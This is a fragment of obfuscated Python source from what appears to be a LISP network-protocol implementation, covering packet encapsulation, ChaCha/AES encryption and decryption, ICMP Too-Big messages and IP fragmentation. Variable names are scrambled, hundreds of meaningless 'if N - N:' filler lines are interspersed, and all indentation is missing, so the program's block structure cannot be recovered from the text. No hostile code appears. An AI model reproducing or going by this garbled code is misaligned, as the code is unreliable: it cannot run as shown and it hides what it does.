if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
if 92 - 92: OoO0O00 * IiII
if 92 - 92: oO0o
if 7 - 7: iII111i
if ( self . outer_source . is_null ( ) ) : return ( None )
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 14 - 14: IiII . IiII % ooOoO0o
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
if 98 - 98: Ii1I - II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
self . lisp_header . key_id ( 0 )
iI1 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and iI1 == False ) :
O0O0 = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
if ( O0O0 in lisp_crypto_keys_by_rloc_encap ) :
iI1iiiiiii = lisp_crypto_keys_by_rloc_encap [ O0O0 ]
if ( iI1iiiiiii [ 1 ] ) :
iI1iiiiiii [ 1 ] . use_count += 1
Oo00oo , oO0oO = self . encrypt ( iI1iiiiiii [ 1 ] , O0O0 )
if ( oO0oO ) : self . packet = Oo00oo
if 71 - 71: I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
if 84 - 84: iIii1I11I1II1 / I1IiiI . OoOoOO00 % I11i
if 99 - 99: Oo0Ooo + i11iIiiIii
if 36 - 36: Ii1I * I1Ii111 * iIii1I11I1II1 - I11i % i11iIiiIii
if 98 - 98: iIii1I11I1II1 - i1IIi + ooOoO0o % I11i + ooOoO0o / oO0o
if 97 - 97: IiII % ooOoO0o + II111iiii - IiII % OoO0O00 + ooOoO0o
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 31 - 31: o0oOOo0O0Ooo
else :
self . udp_sport = lisp_crypto_ephem_port
if 35 - 35: OoOoOO00 + Ii1I * ooOoO0o / OoOoOO00
else :
self . udp_sport = LISP_DATA_PORT
if 69 - 69: ooOoO0o . OOooOOo - I1IiiI
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 29 - 29: i11iIiiIii . I1ii11iIi11i / I1IiiI . OOooOOo + i11iIiiIii
if 26 - 26: IiII / Ii1I - OoooooooOO
if 9 - 9: OoooooooOO * I1ii11iIi11i
if 9 - 9: Oo0Ooo + iII111i
oooooO0oO0ooO = socket . htons ( self . udp_sport )
iIII1IiI = socket . htons ( self . udp_dport )
IIIIIiI1I1 = socket . htons ( self . udp_length )
O0I1II1 = struct . pack ( "HHHH" , oooooO0oO0ooO , iIII1IiI , IIIIIiI1I1 , self . udp_checksum )
if 62 - 62: o0oOOo0O0Ooo / iIii1I11I1II1
if 55 - 55: Ii1I / OoO0O00 + iII111i . IiII
if 47 - 47: O0
if 83 - 83: O0 + OoOoOO00 / O0 / I11i
OoIi11ii1 = self . lisp_header . encode ( )
if 1 - 1: iIii1I11I1II1 % oO0o . iIii1I11I1II1
if 10 - 10: iII111i + OoO0O00
if 6 - 6: OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if ( self . outer_version == 4 ) :
I1iIIi = socket . htons ( self . udp_length + 20 )
Ii = socket . htons ( 0x4000 )
Oo00O0o0O = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , I1iIIi , 0xdfdf ,
Ii , self . outer_ttl , 17 , 0 )
Oo00O0o0O += self . outer_source . pack_address ( )
Oo00O0o0O += self . outer_dest . pack_address ( )
Oo00O0o0O = lisp_ip_checksum ( Oo00O0o0O )
elif ( self . outer_version == 6 ) :
Oo00O0o0O = b""
if 86 - 86: I11i + O0 + Oo0Ooo - I11i
if 34 - 34: II111iiii % I1IiiI % I1Ii111 + Oo0Ooo - OoOoOO00
if 66 - 66: Ii1I * iIii1I11I1II1 - ooOoO0o / I1IiiI
if 62 - 62: IiII . O0 . iIii1I11I1II1
if 94 - 94: ooOoO0o % I11i % i1IIi
if 90 - 90: Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
else :
return ( None )
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
self . packet = Oo00O0o0O + O0I1II1 + OoIi11ii1 + self . packet
return ( self )
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
def cipher_pad ( self , packet ) :
i1iIii = len ( packet )
if ( ( i1iIii % 16 ) != 0 ) :
O0o00 = ( old_div ( i1iIii , 16 ) + 1 ) * 16
packet = packet . ljust ( O0o00 )
if 8 - 8: I1Ii111 * Oo0Ooo - OOooOOo . iIii1I11I1II1
return ( packet )
if 48 - 48: i11iIiiIii / II111iiii + Ii1I + o0oOOo0O0Ooo . I1Ii111 % OOooOOo
if 88 - 88: I1Ii111 . I1Ii111
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 71 - 71: ooOoO0o . I1ii11iIi11i * O0 - I1Ii111 - II111iiii
if 5 - 5: o0oOOo0O0Ooo
if 66 - 66: iII111i / i11iIiiIii * O0
if 78 - 78: IiII - I11i % O0 - OOooOOo % OoO0O00
if 43 - 43: OoO0O00
Oo00oo = self . cipher_pad ( self . packet )
OoOooO = key . get_iv ( )
if 23 - 23: Ii1I * ooOoO0o - I11i . O0 % iIii1I11I1II1
i1 = lisp_get_timestamp ( )
iIiiII = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
iII1I = chacha . ChaCha ( key . encrypt_key , OoOooO ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
o00oOOo0Oo = binascii . unhexlify ( key . encrypt_key )
try :
Oooo0o0oO = AES . new ( o00oOOo0Oo , AES . MODE_GCM , OoOooO )
iII1I = Oooo0o0oO . encrypt
iIiiII = Oooo0o0oO . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 82 - 82: ooOoO0o
else :
o00oOOo0Oo = binascii . unhexlify ( key . encrypt_key )
iII1I = AES . new ( o00oOOo0Oo , AES . MODE_CBC , OoOooO ) . encrypt
if 70 - 70: iIii1I11I1II1 + i11iIiiIii + Oo0Ooo / iII111i
if 9 - 9: OoOoOO00 - IiII
iiIi = iII1I ( Oo00oo )
if 31 - 31: i11iIiiIii + IiII - I1Ii111 * iII111i
if ( iiIi == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 60 - 60: iII111i + OoO0O00 + I11i % iIii1I11I1II1 . Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
if 49 - 49: O0 / II111iiii * I1IiiI - OoooooooOO . II111iiii % IiII
iiIi = iiIi . encode ( "raw_unicode_escape" )
if 13 - 13: oO0o . iIii1I11I1II1 . OOooOOo . IiII
if 58 - 58: I11i
if 7 - 7: II111iiii / IiII % I11i + I1IiiI - O0
if 45 - 45: I1IiiI / iII111i + oO0o + IiII
if 15 - 15: I1IiiI % OoO0O00
if 66 - 66: oO0o * i11iIiiIii . I1Ii111
if ( iIiiII != None ) : iiIi += iIiiII ( )
if 92 - 92: oO0o
if 81 - 81: o0oOOo0O0Ooo % I1IiiI - iII111i / i11iIiiIii
if 73 - 73: O0 * I1Ii111 . i1IIi
if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
if 53 - 53: iII111i / i1IIi / i1IIi
self . lisp_header . key_id ( key . key_id )
OoIi11ii1 = self . lisp_header . encode ( )
if 77 - 77: I11i + i1IIi . I11i
oO0OOO = key . do_icv ( OoIi11ii1 + OoOooO + iiIi , OoOooO )
if 42 - 42: iIii1I11I1II1 % Ii1I - I1ii11iIi11i + iIii1I11I1II1
iiI1I = 4 if ( key . do_poly ) else 8
if 64 - 64: IiII * iIii1I11I1II1 . I1ii11iIi11i / I11i * iIii1I11I1II1
i1i111III1 = bold ( "Encrypt" , False )
III1i1IIII1i = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
i111 = "poly" if key . do_poly else "sha256"
i111 = bold ( i111 , False )
IIIIIII1i = "ICV({}): 0x{}...{}" . format ( i111 , oO0OOO [ 0 : iiI1I ] , oO0OOO [ - iiI1I : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( i1i111III1 , key . key_id , addr_str , IIIIIII1i , III1i1IIII1i , i1 ) )
if 30 - 30: IiII - iII111i - OoO0O00
if 33 - 33: iIii1I11I1II1 / iII111i
oO0OOO = int ( oO0OOO , 16 )
if ( key . do_poly ) :
OOOOiiI = byte_swap_64 ( ( oO0OOO >> 64 ) & LISP_8_64_MASK )
o000Ooo00o00O = byte_swap_64 ( oO0OOO & LISP_8_64_MASK )
oO0OOO = struct . pack ( "QQ" , OOOOiiI , o000Ooo00o00O )
else :
OOOOiiI = byte_swap_64 ( ( oO0OOO >> 96 ) & LISP_8_64_MASK )
o000Ooo00o00O = byte_swap_64 ( ( oO0OOO >> 32 ) & LISP_8_64_MASK )
ooo0O0O0oo0 = socket . htonl ( oO0OOO & 0xffffffff )
oO0OOO = struct . pack ( "QQI" , OOOOiiI , o000Ooo00o00O , ooo0O0O0oo0 )
if 85 - 85: II111iiii + ooOoO0o * I11i
if 12 - 12: Ii1I . I1IiiI % o0oOOo0O0Ooo
return ( [ OoOooO + iiIi + oO0OOO , True ] )
if 28 - 28: Ii1I - I1IiiI % OoO0O00 * I1Ii111
if 80 - 80: OOooOOo * IiII
def decrypt ( self , packet , header_length , key , addr_str ) :
if 4 - 4: iIii1I11I1II1 . I1Ii111 + II111iiii % OoooooooOO
if 82 - 82: OoooooooOO / ooOoO0o * I11i * O0 . I1ii11iIi11i
if 21 - 21: II111iiii + Oo0Ooo
if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
if 76 - 76: I1IiiI * OOooOOo
if ( key . do_poly ) :
OOOOiiI , o000Ooo00o00O = struct . unpack ( "QQ" , packet [ - 16 : : ] )
ii111 = byte_swap_64 ( OOOOiiI ) << 64
ii111 |= byte_swap_64 ( o000Ooo00o00O )
ii111 = lisp_hex_string ( ii111 ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
iiI1I = 4
IIiiI11 = bold ( "poly" , False )
else :
OOOOiiI , o000Ooo00o00O , ooo0O0O0oo0 = struct . unpack ( "QQI" , packet [ - 20 : : ] )
ii111 = byte_swap_64 ( OOOOiiI ) << 96
ii111 |= byte_swap_64 ( o000Ooo00o00O ) << 32
ii111 |= socket . htonl ( ooo0O0O0oo0 )
ii111 = lisp_hex_string ( ii111 ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
iiI1I = 8
IIiiI11 = bold ( "sha" , False )
if 7 - 7: I1IiiI / OoO0O00 + I1Ii111 + I11i / I1IiiI
OoIi11ii1 = self . lisp_header . encode ( )
if 82 - 82: I1ii11iIi11i + OoooooooOO
if 21 - 21: oO0o * oO0o / I11i . iII111i
if 10 - 10: Ii1I * OOooOOo - Oo0Ooo - OoooooooOO / o0oOOo0O0Ooo
if 86 - 86: I1Ii111 % I1IiiI
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Iii1iIIiii1ii = 8
III1i1IIII1i = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
Iii1iIIiii1ii = 12
III1i1IIII1i = bold ( "aes-gcm" , False )
else :
Iii1iIIiii1ii = 16
III1i1IIII1i = bold ( "aes-cbc" , False )
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
OoOooO = packet [ 0 : Iii1iIIiii1ii ]
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
iIi11ii1 = key . do_icv ( OoIi11ii1 + packet , OoOooO )
if 49 - 49: oO0o . OoOoOO00
O0oo = "0x{}...{}" . format ( ii111 [ 0 : iiI1I ] , ii111 [ - iiI1I : : ] )
iIIi1 = "0x{}...{}" . format ( iIi11ii1 [ 0 : iiI1I ] , iIi11ii1 [ - iiI1I : : ] )
if 76 - 76: I1IiiI - I1IiiI - o0oOOo0O0Ooo % ooOoO0o * O0
if ( iIi11ii1 != ii111 ) :
self . packet_error = "ICV-error"
I1i1iI = III1i1IIII1i + "/" + IIiiI11
oo0O0OO = bold ( "ICV failed ({})" . format ( I1i1iI ) , False )
IIIIIII1i = "packet-ICV {} != computed-ICV {}" . format ( O0oo , iIIi1 )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( oo0O0OO , red ( addr_str , False ) ,
# II111iiii + I1Ii111
self . udp_sport , key . key_id , IIIIIII1i ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 68 - 68: Oo0Ooo - iIii1I11I1II1 - i1IIi - oO0o
if 72 - 72: OoOoOO00 / I1Ii111 * IiII % iIii1I11I1II1
if 53 - 53: OoO0O00 . O0 . I1IiiI * OOooOOo / o0oOOo0O0Ooo
if 34 - 34: OoOoOO00
if 16 - 16: i1IIi - I1Ii111 - II111iiii
if 83 - 83: I1IiiI - OoO0O00 - o0oOOo0O0Ooo / O0 - I11i . II111iiii
lisp_retry_decap_keys ( addr_str , OoIi11ii1 + packet , OoOooO , ii111 )
return ( [ None , False ] )
if 27 - 27: Ii1I
if 59 - 59: Ii1I / II111iiii - IiII % OoOoOO00 % OoooooooOO
if 79 - 79: iII111i . OoooooooOO . I1IiiI * O0 * OoO0O00 - OOooOOo
if 33 - 33: I1ii11iIi11i . Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
if 54 - 54: ooOoO0o * iII111i * iII111i % OoOoOO00 - OOooOOo % I1ii11iIi11i
packet = packet [ Iii1iIIiii1ii : : ]
if 44 - 44: Oo0Ooo . OOooOOo + I11i
if 22 - 22: I1Ii111 * OoooooooOO + i11iIiiIii % OoO0O00
if 53 - 53: I1IiiI
if 10 - 10: I1Ii111 / i11iIiiIii - II111iiii
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
iiI11111II = chacha . ChaCha ( key . encrypt_key , OoOooO ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
o00oOOo0Oo = binascii . unhexlify ( key . encrypt_key )
try :
iiI11111II = AES . new ( o00oOOo0Oo , AES . MODE_GCM , OoOooO ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
o00oOOo0Oo = binascii . unhexlify ( key . encrypt_key )
iiI11111II = AES . new ( o00oOOo0Oo , AES . MODE_CBC , OoOooO ) . decrypt
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
Ooi1IIii1i = iiI11111II ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 60 - 60: Ii1I % Oo0Ooo / I11i . iII111i / I1Ii111 - OoooooooOO
if 76 - 76: O0
if 71 - 71: I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
i1i111III1 = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
i111 = "poly" if key . do_poly else "sha256"
i111 = bold ( i111 , False )
IIIIIII1i = "ICV({}): {}" . format ( i111 , O0oo )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( i1i111III1 , key . key_id , addr_str , IIIIIII1i , III1i1IIII1i , i1 ) )
if 4 - 4: o0oOOo0O0Ooo + I11i / iII111i + i1IIi % o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
self . packet = self . packet [ 0 : header_length ]
return ( [ Ooi1IIii1i , True ] )
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
def fragment_outer ( self , outer_hdr , inner_packet ) :
ii = 1000
if 89 - 89: i1IIi . i1IIi
if 10 - 10: iII111i % Oo0Ooo
if 48 - 48: OOooOOo + I1Ii111 % OOooOOo
if 84 - 84: O0 % Ii1I . Ii1I . iII111i * I11i
if 43 - 43: OoOoOO00 . I1ii11iIi11i % i1IIi
OO0O00 = [ ]
oo00 = 0
i1iIii = len ( inner_packet )
while ( oo00 < i1iIii ) :
Ii = inner_packet [ oo00 : : ]
if ( len ( Ii ) > ii ) : Ii = Ii [ 0 : ii ]
OO0O00 . append ( Ii )
oo00 += len ( Ii )
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
I1iiII = [ ]
oo00 = 0
for Ii in OO0O00 :
if 81 - 81: OoOoOO00 + o0oOOo0O0Ooo + Oo0Ooo
if 79 - 79: Oo0Ooo - OoooooooOO % I1Ii111 + OoooooooOO - I11i % OoOoOO00
if 5 - 5: OoOoOO00 . Oo0Ooo
if 89 - 89: I1IiiI / iII111i / OoooooooOO - i11iIiiIii + I1IiiI
Oo0ooo = oo00 if ( Ii == OO0O00 [ - 1 ] ) else 0x2000 + oo00
Oo0ooo = socket . htons ( Oo0ooo )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , Oo0ooo ) + outer_hdr [ 8 : : ]
if 73 - 73: II111iiii + OOooOOo * iII111i / iII111i
if 74 - 74: O0 + iIii1I11I1II1 + oO0o * IiII
if 39 - 39: I1Ii111 . OoO0O00 % ooOoO0o . OOooOOo / iII111i * OoO0O00
if 12 - 12: I1IiiI / o0oOOo0O0Ooo
oOO0O00o0O0 = socket . htons ( len ( Ii ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , oOO0O00o0O0 ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
I1iiII . append ( outer_hdr + Ii )
oo00 += len ( Ii ) / 8
if 68 - 68: i11iIiiIii + OoO0O00
return ( I1iiII )
if 13 - 13: ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 7 - 7: iII111i % I1ii11iIi11i
i1i111Iiiiiii = time . time ( ) - lisp_last_icmp_too_big_sent
if ( i1i111Iiiiiii < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 64 - 64: I1Ii111 + i11iIiiIii
return ( False )
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
i111IiIi1 = socket . htons ( 1400 )
IIii1III = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , i111IiIi1 )
IIii1III += inner_packet [ 0 : 20 + 8 ]
IIii1III = lisp_icmp_checksum ( IIii1III )
if 16 - 16: i11iIiiIii * OOooOOo . IiII
if 100 - 100: OoO0O00 . I11i / Ii1I . o0oOOo0O0Ooo - OoOoOO00 . I11i
if 30 - 30: Ii1I % I11i + o0oOOo0O0Ooo
if 65 - 65: iIii1I11I1II1 . iII111i / Ii1I
if 12 - 12: I1IiiI + I1Ii111
if 80 - 80: oO0o . O0
if 90 - 90: II111iiii / OoO0O00 / Ii1I
O0oooOOo0 = inner_packet [ 12 : 16 ]
IIi11ii = self . inner_source . print_address_no_iid ( )
IiI111I = self . outer_source . pack_address ( )
if 62 - 62: OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
if 90 - 90: I1Ii111
if 35 - 35: II111iiii / Ii1I
if 79 - 79: OoOoOO00 + I1Ii111 * iII111i * Ii1I
if 53 - 53: OOooOOo / Oo0Ooo
if 10 - 10: I1ii11iIi11i . o0oOOo0O0Ooo
if 75 - 75: O0 * i1IIi - I11i / OOooOOo % OOooOOo / OoOoOO00
I1iIIi = socket . htons ( 20 + 36 )
O0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , I1iIIi , 0 , 0 , 32 , 1 , 0 ) + IiI111I + O0oooOOo0
O0O = lisp_ip_checksum ( O0O )
O0O = self . fix_outer_header ( O0O )
O0O += IIii1III
Iii1i1Ii = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( Iii1i1Ii , IIi11ii ,
lisp_format_packet ( O0O ) ) )
if 23 - 23: OoOoOO00 - Ii1I - oO0o / OoooooooOO
try :
lisp_icmp_raw_socket . sendto ( O0O , ( IIi11ii , 0 ) )
except socket . error as oO0ooOOO :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( oO0ooOOO ) )
return ( False )
if 12 - 12: OoooooooOO
if 55 - 55: I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: IiII
if 78 - 78: oO0o % OoOoOO00
if 1 - 1: OoOoOO00 - o0oOOo0O0Ooo / ooOoO0o - IiII / i1IIi
if 28 - 28: OoO0O00 / I1Ii111 * I1IiiI + ooOoO0o
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 48 - 48: O0
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 44 - 44: OoO0O00 * oO0o
Oo00oo = self . fix_outer_header ( self . packet )
if 54 - 54: Ii1I % i1IIi
if 51 - 51: iIii1I11I1II1 - I1IiiI
if 61 - 61: OoooooooOO . Ii1I % oO0o * OoooooooOO
if 96 - 96: Ii1I - II111iiii % OoOoOO00 * I1IiiI * I1IiiI . Oo0Ooo
if 75 - 75: Oo0Ooo + Ii1I + OoO0O00
if 97 - 97: ooOoO0o % i11iIiiIii % I11i
i1iIii = len ( Oo00oo )
if ( i1iIii <= 1500 ) : return ( [ Oo00oo ] , "Fragment-None" )
if 21 - 21: Oo0Ooo / Ii1I / I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
Oo00oo = self . packet
if 86 - 86: i1IIi
if 33 - 33: OoOoOO00 % i11iIiiIii * OOooOOo
if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
if 75 - 75: OoO0O00 % OoooooooOO
if 16 - 16: O0 / i1IIi
if ( self . inner_version != 4 ) :
OOoo0 = random . randint ( 0 , 0xffff )
Ii11I1iIIi = Oo00oo [ 0 : 4 ] + struct . pack ( "H" , OOoo0 ) + Oo00oo [ 6 : 20 ]
O0ooO = Oo00oo [ 20 : : ]
I1iiII = self . fragment_outer ( Ii11I1iIIi , O0ooO )
return ( I1iiII , "Fragment-Outer" )
if 40 - 40: o0oOOo0O0Ooo . o0oOOo0O0Ooo * i11iIiiIii
if 44 - 44: o0oOOo0O0Ooo
if 80 - 80: I1ii11iIi11i + I11i - ooOoO0o - o0oOOo0O0Ooo % Ii1I
if 85 - 85: I1Ii111
if 62 - 62: Ii1I % II111iiii + IiII + OOooOOo % oO0o . I1IiiI
OOoOo0ooOoo = 56 if ( self . outer_version == 6 ) else 36
Ii11I1iIIi = Oo00oo [ 0 : OOoOo0ooOoo ]
oO0OO00 = Oo00oo [ OOoOo0ooOoo : OOoOo0ooOoo + 20 ]
O0ooO = Oo00oo [ OOoOo0ooOoo + 20 : : ]
if 16 - 16: OoooooooOO / oO0o . Ii1I * ooOoO0o - I1IiiI
if 32 - 32: I1IiiI / OoO0O00
if 28 - 28: Oo0Ooo / IiII . iII111i + OoO0O00 + I11i % Oo0Ooo
if 45 - 45: Oo0Ooo / O0 % OoooooooOO
if 92 - 92: Ii1I . OoOoOO00 . I11i - OoooooooOO / ooOoO0o
ooOo0 = struct . unpack ( "H" , oO0OO00 [ 6 : 8 ] ) [ 0 ]
ooOo0 = socket . ntohs ( ooOo0 )
if ( ooOo0 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
I11I1i = Oo00oo [ OOoOo0ooOoo : : ]
if ( self . send_icmp_too_big ( I11I1i ) ) : return ( [ ] , None )
if 100 - 100: oO0o
if ( lisp_ignore_df_bit ) :
ooOo0 &= ~ 0x4000
else :
iiIiiiIii11i1 = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( iiIiiiIii11i1 ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 87 - 87: OoO0O00 + OoooooooOO . ooOoO0o * I11i
if 82 - 82: iIii1I11I1II1 * OoooooooOO
if 50 - 50: I1Ii111 - II111iiii
oo00 = 0
i1iIii = len ( O0ooO )
I1iiII = [ ]
while ( oo00 < i1iIii ) :
I1iiII . append ( O0ooO [ oo00 : oo00 + 1400 ] )
oo00 += 1400
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
if 22 - 22: I1Ii111
OO0O00 = I1iiII
I1iiII = [ ]
iI1iIi1 = True if ooOo0 & 0x2000 else False
ooOo0 = ( ooOo0 & 0x1fff ) * 8
for Ii in OO0O00 :
if 67 - 67: IiII - iIii1I11I1II1 % OOooOOo + I1ii11iIi11i
if 94 - 94: I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
oOOOO = old_div ( ooOo0 , 8 )
if ( iI1iIi1 ) :
oOOOO |= 0x2000
elif ( Ii != OO0O00 [ - 1 ] ) :
oOOOO |= 0x2000
if 82 - 82: i1IIi + o0oOOo0O0Ooo - II111iiii . Ii1I
oOOOO = socket . htons ( oOOOO )
oO0OO00 = oO0OO00 [ 0 : 6 ] + struct . pack ( "H" , oOOOO ) + oO0OO00 [ 8 : : ]
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
